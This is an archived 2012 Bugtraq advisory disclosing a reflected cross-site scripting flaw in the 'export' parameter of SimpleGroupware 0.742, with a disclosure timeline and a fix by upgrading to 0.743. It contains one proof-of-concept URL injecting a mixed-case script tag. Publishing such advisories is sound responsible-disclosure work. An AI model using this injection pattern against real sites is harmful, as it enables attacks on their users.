| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-Id: <201202062119.q16LJxN0019243@sf01web3.securityfocus.com>
Date: Mon, 6 Feb 2012 21:19:59 GMT
From: security@...oserve.de
To: bugtraq@...urityfocus.com
Subject: SimpleGroupware 0.742 Cross-Site-Scripting vulnerability
Advisory: SimpleGroupware 0.742 Cross-Site-Scripting vulnerability
Advisory ID: INFOSERVE-ADV2012-01
Author: Stefan Schurtz
Contact: security@...oserve.de
Affected Software: Successfully tested on SimpleGroupware 0.742
Vendor URL: http://www.simple-groupware.de/
Vendor Status: fixed (see Changelog)
==========================
Vulnerability Description
==========================
SimpleGroupware 0.742 'export' parameter XSS vulnerability
==================
PoC-Exploit
==================
http://[target]/SimpleGroupware_0.742/bin/index.php?export=<ScRiPt >alert('xss')</ScRiPt>
=========
Solution
=========
Upgrade to the latest Version 0.743
====================
Disclosure Timeline
====================
01-Feb-2012 - informed vendor
02-Feb-2012 - fixed by vendor
========
Credits
========
Vulnerabilitiy found and advisory written by the INFOSERVE security team.
===========
References
===========
http://www.infoserve.de/system/files/advisories/INFOSERVE-ADV2012-01.txt
Powered by blists - more mailing lists